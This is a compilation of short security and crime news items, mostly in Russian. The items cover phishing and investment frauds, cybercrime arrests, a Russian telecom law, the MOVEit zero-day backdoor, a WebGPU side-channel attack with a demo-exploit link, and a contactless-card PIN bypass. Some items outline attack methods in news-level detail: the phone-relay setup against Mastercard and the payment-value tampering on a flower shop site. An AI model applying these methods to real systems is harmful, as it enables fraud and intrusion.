[Per TechCrunch](https://techcrunch.com/2021/02/18/following-backlash- whatsapp-to-roll-out-in-app-banner-to-better-explain-its-privacy-update/), the banner will have an option to click "to review", which provides further explanation of the changes and details about how WhatsApp works with Facebook.
WhatsApp says it has updated the FAQ page to "try to address concerns we're hearing."
"Eventually, we'll start reminding people to review and accept these updates to keep using WhatsApp," it notes in the blogpost.
The privacy changes addressed the situation where a WhatsApp user communicates with a business.
While WhatsApp won't share a user's contacts or chats with Facebook, the Facebook-owned messaging app will share a user's profile data with Facebook after the user communicates with a business on WhatsApp.
That communication could happen in a number of ways and Facebook is opening more opportunities for that conversation between user and businesses. For example, as part of Facebook's commerce plans with Shops, Facebook allows business to promote their goods in WhatsApp. If users interact with the offer on WhatsApp, their data is shared with Facebook and its advertiser. That communication could also influence what ads the same user sees on Facebook.
Депутаты утвердили поправки для борьбы с мошенничеством и усиления контроля.
Государственная Дума РФ приняла поправки в законодательство, касающиеся сферы
связи и интернета. Новые правила значительно ужесточают требования к
операторам связи, мессенджерам и популярным блогерам.
Изменения в первую очередь затронут иностранных граждан. Теперь для получения
SIM-карты им придется лично посетить офис оператора связи и пройти
биометрическую идентификацию. Кроме того, одно лицо сможет оформить не более
10 абонентских номеров.
Российских граждан также ждут ограничения - им разрешат иметь не более 20
абонентских номеров. При этом через портал «Госуслуги» можно будет узнать,
сколько номеров оформлено на конкретного человека, и при необходимости
приостановить их обслуживание.
По словам авторов инициативы, такие меры направлены на борьбу с телефонным
мошенничеством, которое в последние годы стало настоящим бичом для россиян.
Кроме того, закон предусматривает обязанность владельцев мессенджеров
предоставлять по требованию Роскомнадзора сведения о пользователях сервиса
обмена мгновенными сообщениями, а также не допускать получения пользователями
мессенджеров анонимных сообщений и звонков.
Особое внимание уделено популярным блогерам и владельцам каналов с аудиторией
более 10 тысяч подписчиков. Они должны будут передавать свои данные в
Роскомнадзор. В противном случае их ждут серьезные ограничения: запрет на
размещение рекламы от российских рекламодателей, репосты другими каналами и
сбор пожертвований.
Председатель Комитета по информационной политике, информационным технологиям и
связи Александр Хинштейн подчеркнул, что новые правила коснутся и каналов в
Telegram. По его словам, многие из них по влиянию уже превосходят традиционные
СМИ, но при этом практически не несут ответственности за распространяемую
информацию, включая фейки.
«Владельцы каналов с аудиторией более 10 тысяч подписчиков будут обязаны
подать регулятору сведения о себе и не распространять запрещенную информацию»,
Полицейские задержали в Воронеже семь человек, которые входили в группу нелегальных банкиров и занимались обналичиванием денег, их оборот составил более 400 млн рублей.
"Задержаны семь членов организованной преступной группы в возрасте от 26 до 63 лет, подозреваемых в незаконной банковской деятельности. Предварительно установлено, что злоумышленники создали нелегальную систему банковского обслуживания с широким спектром финансовых услуг и занимались нелегальным бизнесом в период с января 2020 года по январь 2023 года. За указанный период криминальный оборот составил более 400 млн рублей, а доход злоумышленников превысил 26 млн рублей", - говорится в сообщении.
Как уточняется в сообщении, возбудили уголовное дело по ч. 2 ст. 172 УК РФ (незаконная банковская деятельность в составе организованной группы). По данным полиции, для обналичивания денег группа использовала счета 27 фирм- однодневок с комиссией для заказчика в размере 6,5%.
"Полицейскими проведено 10 обысков, в ходе которых изъята компьютерная техника, печати аффилированных компаний, банковские карты, финансово- хозяйственная документация и другие предметы, имеющие доказательственное значение. Фигуранты полностью признали вину в содеянном, соучастникам избрана мера процессуального принуждения в виде обязательства о явке", - говорится в сообщении.
sc: mvdmedia.ru/news/operativnye-novosti/v-voronezhe-politsiya-presekla- deyatelnost-gruppy-tenevykh-bankirov-obnalichivshikh-bolee-400-mln-ru
Исследователи продемонстрировали новый вектор атаки, угрожающий пользователям нескольких популярных браузеров и видеокарт. Метод основан на использовании WebGPU.
Новая киберугроза рассматривается в отчёте специалистов Технологического университета Граца в Австрии и Университета Ренна во Франции.
Отмечается, что в ходе исследования эксперты «щупали» вездесущий API WebGPU, который позволяет веб-разработчикам использовать графический процессор для высокопроизводительных вычислений в браузере.
Задействуя этот API, специалисты смогли воспроизвести атаку, полностью работающую в браузере с включённым JavaScript. Новый подход упрощает проведение удалённых кибернападений.
По словам исследователей, им удалось выявить один из первых векторов атаки по сторонним каналам кеша GPU из самого браузера. Для эксплуатации достаточно заманить пользователя на специальный сайт, где размещён вредоносный код WebGPU.
Есть и нюанс: потенциальную жертву нужно продержать на ресурсе несколько минут, пока работает эксплойт. Для этого пользователю можно подсунуть статью, читая которую посетитель как раз и продержится необходимое время.
Выявленный вектор можно использовать для извлечения конфиденциальной информации, включая пароли, поскольку он позволяет использовать тайминг нажатия клавиш. Помимо этого, способ допускает кражу ключей шифрования AES на базе графического процессора, на что как раз и потребуется несколько минут.
Все скомпрометированные данные могут передаваться со скоростью до 10 Кбит/с.
Исследователи предупредили представителей Mozilla, AMD, NVIDIA и Chromium о проблеме, после чего NVIDIA даже выпустила официальное уведомление.
Демонстрационный эксплойт можно найти по этой ссылке: https://ginerlukas.com/gpuattacks/
• Source: https://ginerlukas.com/publications/papers/WebGPUAttacks.pdf
Мошенники 3 года собирали инвестиции на создание несуществующего банка.
20 ноября по запросу США полиция Эстонии и ФБР арестовали в Таллине двух граждан Эстонии по подозрению в организации финансовой пирамиды и незаконной добыче криптовалюты на сумму $575 млн.
Согласно судебным документам , 37-летние Сергей Потапенко и Иван Турыгин убедили сотни тысяч жертв инвестировать в сервис майнинга криптовалюты HashFlare и банк виртуальной валюты Polybius.
Двое мужчин, которые находятся под стражей в ожидании экстрадиции в США, собрали инвестиции на сумму более $500 млн. и использовали подставные компании для отмывания денег, а также для покупки недвижимости и роскошных автомобилей.
HashFlare была масштабной операцией по добыче криптовалюты, которая позволяла клиентам сдавать в аренду свои вычислительные мощности и собирать часть произведенной криптовалюты. Однако, на самом деле у HashFlare не было оборудования для майнинга, вопреки заявлениям мошенников своим инвесторам.
По данным следствия, «оборудование» HashFlare выполняло добычу биткойнов со скоростью менее 1% вычислительной мощности. Когда инвесторы захотели вывести свои доходы, мошенники не смогли расплатиться добытой валютой. Вместо этого ответчики либо под разными предлогами переносили перевод средств, либо расплачивались с инвесторами не добытой криптовалютой, а валютой, которую они купили на бирже.
HashFlare работал с 2015 года, а в 2018 году сервис закрылся якобы из-за «нестабильности на рынке криптовалют и высоких затрат на обслуживание».
По словам Минюста США, сервис HashFlare являлся финансовой пирамидой. Потапенко и Турыгин целенаправленно затрудняли для клиентов вывод средств, в том числе установили требования KYC (Знай своего клиента), согласно которым пользователи должны загружать документы, удостоверяющие личность, прежде чем они смогут снимать средства.
Потапенко и Турыгин также собрали инвестиции для создания банка виртуальной валюты Polybius — обвиняемые собрали более $25 млн., но никогда не создавали банк и не выплачивали дивиденды.
Их также обвиняют в использовании подставных компаний и поддельных контрактов для отмывания доходов, а в их деле числилось «по меньшей мере 75 объектов недвижимости, 6 роскошных автомобилей, криптовалютные кошельки и тысячи компьютеров для майнинга криптовалюты».
Потапенко и Турыгин обвиняются по 17 пунктам обвинения, связанным с мошенничеством с использованием электронных средств, и по 1 пункту обвинения в сговоре с целью отмывания денег — каждое обвинение наказывается лишением свободы на срок до 20 лет.
ФБР создало страницу для обратной связи и сбора дополнительной информации от жертв этого мошенничества.
source:
fbi.gov/how-we-can-help-you/victim-services/seeking-victim-
information/seeking-victims-in-the-hashflare-investigation
justice[.]gov/usao-wdwa/pr/two-estonian-citizens-arrested-575-million-
cryptocurrency-fraud-and-money-laundering
Двоим 17-летним жителям канадского Гамильтона предъявили обвинение после кражи у гражданина США $4,2 млн в криптовалютах посредством фишинга. Об этом сообщают местные СМИ.
Расследование началось в июне 2023 года. Согласно материалам дела, подростки выдали себя за службу поддержки криптовалютной биржи Coinbase и обманом заставили жертву перевести им $4,2 млн в Ethereum и биткоинах.
Часть похищенных средств фигуранты использовали для покупки никнейма @zombie в Instagram.
По данным полиции, в общей сложности у задержанных было более $13,4 млн в криптовалютах.
Их обвинили в краже более $5000 и владении имуществом или доходами от собственности, полученными преступным путем.
По данным экспертов Beosin, за первую половину 2023 года криптоиндустрия потеряла около $655,6 млн в результате взломов, мошенничеств и rug pull.
• Source: <https://www.cbc.ca/news/canada/hamilton/crypto-teens- charged-1.6896349>
Хакеры стали еще быстрее и неуловимее, чем раньше
Как показывают данные за 2021 год, на перемещение от первоначально взломанной машины до других систем у хакеров в среднем уходит 98 минут.
Киберпреступники стали передвигаться по атакуемым сетям быстрее и использовать инструменты, которые сложнее детектировать. Об этом сообщается в новом отчете ИБ-компании CrowdStrike за 2022 год.
Согласно отчету, хакеры могут добраться от точки начального доступа до конечных точек менее, чем за два часа. Как показывают данные за 2021 год, на перемещение от первоначально взломанной машины до других систем у атакующих в среднем уходит 98 минут. Хотя этот показатель немного выше по сравнению с 92 мин в 2020 году, он представляет достаточно небольшое окно, в течение которого хакеры могут проникнуть в сеть, прежде чем их обнаружат средства безопасности и администраторы. 98 мин также представляют собой заметное снижение по сравнению со средним показателем 4 часа 37 минут в 2018 году.
Проблема усугубляется еще и тем, что киберпреступники стали чаще прибегать в атаках к подручным средствам. Хакеры отказываются от локальной установки вредоносного ПО на конечные точки, отдавая предпочтение легитимным инструментам для управления системой.
Как сообщается в отчете CrowdStrike, по сравнению с прошлым годом число подобных атак без использования вредоносного ПО увеличилось на 45%. На их долю приходится 62% от всех зафиксированных атак. Благодаря использованию только легитимных инструментов киберпреступники могут перемещаться по сетям и получать доступ к конфиденциальным данным, не опасаясь быть обнаруженными.
В последние месяцы активизировались хакеры, финансируемые правительствами. В частности, возросло количество атак иранских хакеров.
Кроме того, свои навыки в эксплуатации уязвимостей совершенствуют киберпреступники, работающие на Китай.
«Китайские злоумышленники долгое время разрабатывали и развертывали эксплоиты, способствующие целенаправленным операций по вторжению; однако в 2021 году они сместили свой фокус в сторону от привычных методов эксплуатации. В течение долгих лет китайские киберпреступники полагались на эксплоиты, требующие действий со стороны пользователя, таких как открытие вредоносного документа или другого файла, прикрепленного к электронным письмам, или посещение сайта, содержащего вредоносный код. Для сравнения, эксплоиты, развернутые этими же киберпреступниками в 2021 году, в значительной степени были сосредоточены на уязвимостях в устройствах или сервисах, подключенных к интернету», - говорится в отчете.
Хакеры из Северной Кореи стали распространять вирусы с помощью «Центра обновления Windows»
По данным компании Malwarebytes Labs, работающей в сфере кибербезопасности, северокорейская хакерская группировка Lazarus использует «Центр обновления Windows» для внедрения вредоносного кода в компьютеры жертв. Это позволяет злоумышленникам обойти основные механизмы обеспечения безопасности и использовать GitHub в качестве сервера для распространения вредоносного кода.
На прошлой неделе команда Malwarebytes Threat Intelligence обнаружила атаку с помощью двух документов Word, связанных с поддельными вакансиями в аэрокосмической компании Lockheed Martin. Цель Lazarus — проникнуть в правительственные структуры США, работающие в сфере обороны и аэрокосмической отрасли, и украсть как можно больше секретных данных.
Для атак используются документы Salary_Lockheed_Martin_job_opportunities_confidential.doc и Lockheed_Martin_JobOpportunities. docx. Как следует из их названий, оба документа призваны привлечь жертв перспективой трудоустройства в Lockheed Martin. Ряд вредоносных макрокоманд, встроенных в документы Word, начинают проникать в систему после открытия файла, немедленно внедряя код в механизм запуска компьютера, чтобы гарантировать, что перезагрузка не помешает действиям вируса. Интересно, что часть процесса внедрения вредоносного кода в систему задействует клиент «Центра обновления Windows» для установки вредоносных библиотек DLL. Это очень умно, так как этот метод позволяет обойти большинство средств обеспечения безопасности.
Стоит отметить, что в прошлом Lazarus уже проводила атаки, известные под кодовым названием «Работа мечты». Хакеры заставляли госслужащих думать, что их хотят нанять крупные мировые компании, тем временем воруя данные с их рабочих станций. Эта кампания имела большой успех и позволила злоумышленникам проникнуть в сети десятков государственных организаций по всему миру.
МВД Татарстана [признало](https://realnoevremya.ru/articles/323873-kak- kazanec-haknul-sistemu-zakazov-rus-buket) потерпевшими в уголовном деле онлайн-сервис доставки цветов «Русский букет» и его партнеров. Казанский программист Аслан Шигапов обнаружил техническую уязвимость в системе заказа на сайте компании и до марта 2022 года оформлял заказы на цветы с заниженной стоимостью. Похищенная продукция затем перепродавалась через сервис бесплатных объявлений. Общий ущерб составил более 1 млн рублей, который был полностью возмещен обвиняемым до судебного разбирательства. Потерпевшие ходатайствовали о прекращении уголовного дела за примирением сторон, но суд удовлетворил это частично.
Аслан Шигапов был привлечен к ответственности по статьям о неправомерном доступе к компьютерной информации и мошенничестве в особо крупном размере. За последнее преступление ему грозило до 10 лет лишения свободы. Советский районный суд Казани признал Шигапова виновным и назначил условное наказание — один год лишения свободы с таким же испытательным сроком. Если в течение года он не нарушит закон, наказание не будет исполнено.
По данным следствия, Шигапов оформлял заказы на цветы через сайт rus-buket.ru, используя уязвимость системы. Эта уязвимость позволяла ему изменять информацию о сумме оплаты, отправляя на сервер данные о полной оплате заказа, при этом с его счетов списывались минимальные суммы. Таким образом, он оформил более 50 заказов на сумму от 900 рублей до 102 тысяч рублей. Самый крупный заказ включал букеты из 202 роз и тюльпаны, общая стоимость которых составляла 102 тысячи рублей, но оплачено было всего 5 рублей.
Как установлено в приговоре суда, схема хищения заключалась в том, что при оплате оформленного заказа Шигапов возвращался на предыдущий этап, останавливал загрузку веб-страницы и модифицировал данные о стоимости заказа. После внесения изменений процесс оплаты возобновлялся с новой стоимостью, что позволяло значительно снизить затраты.
Шигапов выступал посредником и предлагал своим клиентам выбрать букет на сайте сервиса, но оплатить ему напрямую. Заказы оформлялись не только по России, включая Казань, Набережные Челны, Нижнекамск, Москву и Волгоград, но и за границу — в Таиланд, Турцию и Казахстан. В числе похищенных товаров были не только цветочные композиции, но и плюшевые игрушки и конфеты. Клиентов он находил через знакомых и объявления на «Авито», а оплату принимал на свою карту, через «ЮМоney» или через третьих лиц.
Ещё одна деталь: Шигапов занимался своей деятельностью в рабочее время, используя компьютер своего работодателя ООО «СервисМонтажИнтеграция». В марте 2022 года сотрудники полиции сообщили службе экономической безопасности предприятия о действиях Шигапова, после чего он был уволен по собственному желанию.
В приговоре перечислены названия похищенных букетов: «Сон принцессы», «Розовый жемчуг», «Счастливый мишка», «Ноты любви», «Пение птиц», «Королевский сад», букеты из 101 розы и другие.
В числе потерпевших значатся шесть компаний, связанных с сервисом «Русский букет», включая «Вебиндустрия» и её партнеров. Адвокат потерпевших Юлия Прушинская заявила, что за каждый доставленный заказ компания «Русский букет» была обязана рассчитываться с салонами-партнерами, что привело к значительным убыткам. Общий ущерб суд оценил в 1 млн 22 тысячи рублей, включая заказы, которые не были выполнены. До подачи заявления в полицию представители компании сообщили о неизвестном хакере, взломавшем их сайт, что позволило оперативно выявить схему хищения.
Суд учел смягчающие обстоятельства: полное признание вины, помощь следствию, погашение ущерба, молодой возраст Шигапова и его положительные характеристики. Судья частично прекратил дело по эпизоду о неправомерном доступе к компьютерной информации, но по статье о мошенничестве вынес обвинительный приговор. Изъятые у Шигапова системный блок и жесткий диск были конфискованы в доход государства.
Приговор вступил в силу.
Самарская полиция раскрыла крупное мошенничество, совершенное с использованием «Пушкинских карт». Как сообщила официальный представитель МВД России Ирина Волк, суммарный ущерб, причиненный Министерству культуры страны, превысил 12 миллионов рублей. В реализации схемы принимали участие три человека.
«По версии следствия, в 2022 году один из них разместил на платформе «PRO.Культура РФ» сведения о фиктивном мероприятии — спектакле "Мнимый больной". При этом было обеспечено его соответствие критериям, необходимым для включения в реестр мероприятий программы "Пушкинская карта" и принятия соответствующего решения экспертным советом Министерства культуры. Злоумышленники вовлекли в свою схему более 3300 молодых людей из 62 субъектов Российской Федерации, которые не были осведомлены о совершаемом преступлении», — написала Волк.
С помощью «Пушкинских карт» этих людей были куплены 3478 билетов на несуществующий спектакль. Само мероприятие они, понятное дело, не посетили. Тем не менее силовикам удалось узнать об афере и провести детальное расследование. Всем троим предъявлены обвинения по ч. 4 ст. 159 УК РФ (мошенничество группой лиц в особо крупном размере), дело передано в суд.
t.me/IrinaVolk_MVD/2330
Прокуратура Вилейского района поддержала в суде Молодечненского района государственное обвинение по уголовному делу в отношении 41-летнего жителя г.Вилейки – ему инкриминировано незаконное распространение из корыстных побуждений аутентификационных данных, посредством которых возможно получение доступа к счетам и электронным кошелькам.
Установлено, что с марта по август 2022 года обвиняемый перепродавал заинтересованным лицам учетные записи в сети Интернет, которые содержали в себе аутентификационные данные пользователей. При помощи названных сведений они получали доступ к чужим счетам и электронным кошелькам.
Реализуя преступную схему, обвиняемый получил вознаграждение в виде криптовалюты в размере свыше 198 тыс. рублей.
Справочно. Согласно подп.1.2 п.1 ст.2 Закона Республики Беларусь от 19 апреля 2022 года №164-З «О платежных системах и платежных услугах» аутентификационные данные – это уникальные данные (персонализированные признаки), сообщаемые поставщиком платежных услуг идентификационному пользователю (формируемые идентификационным пользователем или в процессе идентификации пользователя) платежных услуг.
В ходе предварительного расследования обвиняемый уплатил доход, полученный преступным путем, в полном объеме. При этом в судебном заседании признал свою вину и раскаялся в содеянном.
С учетом представленных государственным обвинителем доказательств суд Молодечненского района постановил обвинительный приговор. На основании ч.2 ст.222 Уголовного кодекса Республики Беларусь обвиняемому назначено наказание в виде лишения свободы на срок 3 года со штрафом в размере 5000 базовых величин (200 тыс. рублей).
На основании ч.ч.2,4 ст.77 Уголовного кодекса Республики Беларусь суд отсрочил исполнение основного наказания на 3 года, возложил на обвиняемого определенные обязанности с установлением контроля за его поведением, а также постановил ему в свободное от работы и (или) учебы время выполнить общественно полезные работы в объеме 120 часов.
По правилам ч.1 ст.46-1 Уголовного кодекса Республики Беларусь суд применил специальную конфискацию к средствам совершения преступления – двум аппаратным («холодным») криптокошелькам, ноутбуку, SSD-накопителю, которые безвозмездно изъяты в доход государства.
Приговор не вступил в законную силу, может быть обжалован и опротестован в апелляционном порядке.

23-летний выпускник факультета компьютерных наук Индийского института информационных технологий (IIIT) Боммалуру Лакшмипати (Bommaluru Lakshmipathi) был арестован полицией Бангалора по подозрению в многочисленных атаках на компанию Reward 360, которая управляет системами лояльности в интересах корпоративных клиентов, и краже бонусных баллов по кредитным картам в размере 41,6 миллиона рупий (более 48 миллионов рублей).
По данным India Times, большую часть этой суммы индиец хранил в золотых и серебряных слитках, а также в кошельках Flipkart и Amazon. Кроме того, он купил семь дорогих мотоциклов. Подробности схемы не разглашаются. Известно, что Лакшмипати начал свою противозаконную деятельность еще в годы обучения в университете.
Однажды у него возникли проблемы с кредиткой, которые банк не смог разрешить, предложив ему в качестве извинений подарочный ваучер. После недолгих размышлений Лакшмипати удалось найти способ взломать базы Reward 360 и прописывать в различных ваучерах на имена других людей номер своей банковской карты. В итоге индиец был арестован всего через три месяца расследования.
О самом взломщике известно лишь, что он — выходец из достаточно бедной семьи фермеров. Все свои драгоценные металлы он хранил прямо в доме родителей, которые и не догадывались, что соседствуют с таким богатством. Дело Лакшмипати стало самым крупным из всех киберпреступлений 2023 года в Индии.
source: indiatimes.com/worth/news/iiit-graduate-4-crore-credit-card-fraud- bengaluru-615025.html
Хакеры нацелились на 0-day в MOVEit Transfer, который массово используется в атаках для кражи данных.
MOVEit Transfer — это решение для управляемой передачи файлов (MFT) в локальном и облачном исполнении, разработанное Ipswitch, дочерней компанией американской корпорации Progress Software, которое позволяет предприятиям безопасно передавать файлы с помощью SFTP, SCP и HTTP.
Пока неясно, когда произошла эксплуатация и какие субъекты угроз стоят за атаками. Rapid7 заявляет, что проблема в MOVEit Transfer представляет собой уязвимость SQL-инъекции, которая приводит к RCE и в настоящее время не имеет CVE.
Progress экстренно выпустила [рекомендации по безопасности](https://community.progress.com/s/article/MOVEit-Transfer- Critical-Vulnerability-31May2023) с предупреждением о критической уязвимости в MOVEit MFT, которая может привести к эскалации привилегий и потенциальному несанкционированному доступу к среде. Компания предложила меры по ее устранению до тех пор, пока не будут установлены исправления.
Для снижения риска эксплуатации разработчики рекомендуют администраторам блокировать внешний трафик на порты 80 и 443 на сервере MOVEit Transfer.
Помимо того, что блокировка этих портов предотвратит внешний доступ к веб- интерфейсу, она отразится на работе некоторых задач автоматизации MOVEit и модуля Outlook MOVEit Transfer, а также заблокирует API. Однако протоколы SFTP и FTP/s можно по-прежнему использовать для передачи файлов.
Кроме того, следует обращать внимание на «c:\MOVEit Transfer\wwwroot\» на наличие неожиданных файлов, включая резервные копии или загрузки больших файлов, что является одним из индикаторов возможной компрометации.
Ряд инфосек- компаний сообщили об атаках с использованием 0-day MOVEit, включая [Huntress](https://www.huntress.com/blog/moveit-transfer-critical- vulnerability-rapid-response), [Rapid7](https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed- exploitation-of-critical-moveit-transfer-vulnerability/), [TrustedSec](https://www.trustedsec.com/blog/critical-vulnerability-in- progress-moveit-transfer-technical-analysis-and-recommendations/), [GreyNoise](https://www.greynoise.io/blog/progress-moveit-transfer-critical- vulnerability) и Volexity.
TrustedSec отмечает, что массовая эксплуатация началась 28 мая. При этом GreyNoise сообщил о том, что уже 3 марта наблюдал активность сканирования.
В атаках, наблюдаемых в последние дни, злоумышленники, похоже, использовали 0-day для развертывания бэкдора в файле с именем «human2.aspx» в папке «wwwroot» ПО MOVEit, который позволяет получить список файлов и пользователей, загружать файлы в MOVEit и добавлять пользователя-администратора бэкдора.
Mandiant также подключилась к расследованию вторжения, уже столкнулась с массовой эксплуатацией и широкомасштабной кражей именно ценных данных. Судя по всему, пострадали крупные организации. На данный момент злоумышленники не начали вымогать деньги у жертв, поэтому неясно, кто стоит за атаками.
Также неясно точное число жертв, но поиск Shodan показывает около 2500 доступных в Интернете экземпляров MOVEit Transfer. По данным самого поставщика, решение используются сотнями тысяч предприятий, в том числе 1700 компаниями-разработчиками ПО.
Подавляющее большинство экземпляров, найденых в сети, располагаются в США, среди них даже нашлось Министерство внутренней безопасности (DHS).
В случае подтверждения это будет второй популярный продукт MFT, на который нацелены киберпреступники за последние месяцы, после не менее резонансной истории с Accellion FTA в декабре 2020 года.
По данным следствия, 28-летний индивидуальный предприниматель из Витебска создал в национальной доменной зоне сайт по предоставлению платных услуг, связанных с Ddos-атаками в отношении интернет-ресурсов по пожеланию заказчиков. Для этого им разработана специальная вредоносная программа. Также установлены факты сбора и распространения персональных данных граждан.
Помимо этого, мужчина вел новостной канал, где размещал ложную информацию, дискредитирующую государственные органы власти и правоохранительную систему.
Следователями возбуждены уголовные дела по статьям 354 (разработка вредоносных компьютерных программ) и 203-1 (незаконные действия в отношении информации о частной жизни и персональных данных) Уголовного кодекса Беларуси. К жителю Витебска применена мера пресечения в виде заключения под стражу.
Поддельная инвестиционная платформа усыпила бдительность десятков тысяч вкладчиков.
Недавно, в результате скоординированной операции с участием пяти европейских государств, был ликвидирован крупный бизнес по инвестиционному онлайн- мошенничеству. Правоохранителям удалось задержать пятеро подозреваемых и деактивировать несколько незаконных колл-центров, которые использовались в данной мошеннической схеме. У задержанных было обнаружено множество предметов роскоши, солидный запас наличных и криптовалюты.
Мошенническая операция позволила злоумышленникам суммарно похитить около 89 миллионов евро (почти 8 миллиардов рублей) у 33 тысяч различных жертв. Над ликвидацией поддельной инвестиционной платформы совместно работали Евроюст и Европол. Также была задействована большая команда полицейских и следователей, действующая на территории Болгарии, Грузии, Румынии и Израиля. В общей сложности правоохранители провели обыски в 15 различных местах, и только в 5 из них были обнаружены незаконные колл-центры.
Схема мошенничества привлекала потенциальных инвесторов с помощью «профессионально выглядящих» баннеров на веб-сайтах, а также заманчивой рекламы в социальных сетях. Затем всех заинтересованных «обрабатывали» сотрудники подпольных колл-центров.
По словам Европола, мошенники демонстрировали жертвам поддельные графики роста доходов и обещали приумножить их капитал. Стартовые инвестиции были относительно скромными, всего 200-250 евро. Однако позже к делу подключались так называемые «личные финансовые консультанты», которые, по-видимому, «поднимали ставки» и просили уже о более крупных инвестициях, чтобы резко увеличить потенциальный доход.
Излишне говорить, что вся обещанная злоумышленниками прибыль так ни во что и не материализовалась. Инвестиции пострадавших просто перенаправлялись на банковские счета мошенников.
Схема действовала в период с 2019 по 2021 год. Считается, что Европол совместно с правоохранителями задержали лишь часть ответственных, и многие бывшие участники данной мошеннической кампании уже давно успели создать собственные колл-центры, которые работают по сей день. Однако не стоит недооценивать успех операции, ведь даже так количество жертв мошенников сократится многократно.
Как дополнительно сообщил Европол, мошенники использовали доступные в то время низкие процентные ставки, поощряя инвестиции в финансовые продукты с высоким риском, такие как бинарные опционы. По сравнению с так называемыми «ванильными» опционами, бинарные опционы являются достаточно экзотическим видом финансовых вложений, которым зачастую и злоупотребляют мошенники в своих схемах.
Стоит ли говорить, что даже без «помощи» киберпреступников лезть в подобные финансовые авантюры не стоит. Своим бюджетом лучше распоряжаться самостоятельно и не прибегать к помощи «финансовых консультантов». Более того, всегда стоит помнить, что любые попытки быстро приумножить свои денежные запасы крайне редко заканчиваются удачно, а любые сторонние лица, которые обещают космические доходы на пустом месте, скорее всего, — простые мошенники.
source: europol.europa.eu/media-press/newsroom/news/further-action-against- fraudulent-online-investment-platform-five-arrests-of-high-value-targets
Прокуратура Минской области направила в суд Ленинского района г.Минска уголовное дело в отношении 26- и 19-летних братьев П. Им инкриминировано покушение на хищение имущества путем модификации компьютерной информации, совершенное в особо крупном размере группой лиц.
Согласно материалам дела обвиняемые в течение июня-июля 2020 года через мобильные телефоны и ноутбуки, подключенные к сети Интернет, находили пользователей электронной торговой площадки kufar.by. Общаясь в различных мессенджерах, братья П. обещали им приобрести их товары, указанные в объявлениях. После этого они направляли продавцам гиперссылку на ресурс kufar.сс, визуально схожий с kufar.by. Данную площадку создали и администрировали сами братья.
Обвиняемые изначально не намеревались покупать какие-либо товары – они предлагали продавцам вводить в специально разработанные поля на kufar.сс реквизиты банковских платежных карт.
Затем с помощью специальных компьютерных алгоритмов братья П. помещали указанные реквизиты на хранение в свою базу данных, после чего похищали чужие деньги.
Всего обвиняемые пытались похитить более 42 тыс. рублей у 120 граждан. Реально им удалось завладеть средствами 77 потерпевших на сумму свыше 23 тыс. рублей.
В ходе предварительного расследования обвиняемые возместили причиненный ущерб в полном объеме.
После изучения материалов дела в прокуратуре Минской области пришли к выводу об обоснованности обвинения, объективном и полном исследовании обстоятельств преступления. Согласились с квалификацией содеянного по ч.1 ст.14 и ч.4 ст.212 Уголовного кодекса Республики Беларусь.
При направлении уголовного дела в суд прокурор оставил без изменению ранее примененную к обвиняемым меру процессуального принуждения в виде временного ограничения права на выезд из Республики Беларусь.
Виртуальная валюта не является законным платежным средством, деловая деятельность, связанная с виртуальной валютой, является незаконной, говорится в опубликованном Народным банком Китая (ЦБ) в пятницу уведомлении.
俄罗斯外交部向大使通报了美国IT巨头干涉俄罗斯选举的无可辩驳的证据。
俄罗斯外交部召见美国驻莫斯科大使约翰沙利文,讨论美国IT公司干涉国家杜马选举。这是在该部门的网站上报道的。
更多详情:https://www.securitylab.ru/news/524325.php
How to find this? which American company?
Исследователи из Швейцарской высшей технической школы Цюриха обнаружили способ обойти защиту ПИН-кодом на бесконтактных картах Mastercard и Maestro. В настоящий момент уязвимость уже устранили.
Выявленная экспертами лазейка позволяла злоумышленникам использовать украденные банковские карты для крупных покупок, при этом не требовалось вводить ПИН-код при бесконтактной оплате.
Хуже всего, что описанный исследователям сценарий вполне можно воспроизвести в реальной ситуации, более того — атака крайне незаметна. Специалисты даже опасаются, что новые подобные баги повлекут за собой их массовую эксплуатацию.
Для осуществления подобной атаки злоумышленнику придётся «вклиниться» между украденной картой и терминалом для оплаты (PoS). Фактически это тот же «Человек посередине» (Man-in-the-Middle, MitM), только немного в другой интерпретации. Преступнику в этом случает понадобятся:
украденная банковская карта;
два смартфона на Android;
кастомное Android-приложение, способное взаимодействовать с полями транзакции.
Это приложение, которое необходимо установить на оба смартфона, будет работать в качестве эмуляторов. Один из девайсов злоумышленник помещает рядом с украденной картой — он будет эмулировать PoS-терминал: обманом инициировать транзакцию и вытаскивать данные карты.
Второй смартфон в это время будет исполнять роль эмулятора карты и передавать реальному терминалу данные транзакции.
Таким образом, для продавца всё будет выглядеть так, будто обычный клиент расплачивается с помощью мобильного устройства. Кого сейчас этим удивишь?
С техническими подробностями метода специалистов можно ознакомиться в их отчёте: https://www.usenix.org/conference/usenixsecurity21/presentation/basin
• Video:
Команда из Технологического университета Мюнхена (TUM) разработала и ввела в эксплуатацию производство компьютерного чипа, который очень эффективно реализует постквантовую криптографию. Такие чипы могут обеспечить защиту от будущих хакерских атак с использованием квантовых компьютеров. Исследователи также включили в чип аппаратных троянов, чтобы изучить методы обнаружения этого типа «вредоносного ПО с фабрики микросхем».
Хакерские атаки на промышленные предприятия больше не являются научной фантастикой. Злоумышленники могут украсть информацию о производственных процессах или отсановить деятельность целых предприятий. Чтобы предотвратить это, обмен данными между микросхемами в отдельных компонентах зашифрован. Однако вскоре многие алгоритмы шифрования станут неэффективными. Установленные процессы, которые могут отражать атаки, запущенные с помощью современных компьютерных технологий, будут беззащитны против квантовых компьютеров. Это особенно важно для оборудования с длительным сроком службы, такого как промышленные объекты.
По этой причине эксперты по безопасности во всем мире работают над разработкой технических стандартов для «постквантовой криптографии». Одна из проблем связана с огромной вычислительной мощностью, необходимой для этих методов шифрования. Команда, работающая с Георгом Зиглом, профессором безопасности информационных технологий в TUM разработала и ввела в эксплуатацию высокоэффективный чип для постквантовой криптографии.
Скорость и гибкость за счет комбинации аппаратного и программного обеспечения
Профессор Зигл и его команда использовали подход, основанный на совместном проектировании аппаратного и программного обеспечения, в котором специализированные компоненты и управляющее программное обеспечение дополняют друг друга. «Наш чип является первым чипом для постквантовой криптографии, который полностью основан на подходе совместного проектирования аппаратного и программного обеспечения», - говорит профессор Зигл.
«В результате он примерно в 10 раз быстрее при шифровании с помощью Kyber - одного из наиболее многообещающих кандидатов для постквантовой криптографии - по сравнению с чипами, полностью основанными на программных решениях. Он также потребляет примерно в восемь раз меньше энергии и почти такой же гибкий»
На основе стандарта с открытым исходным кодом
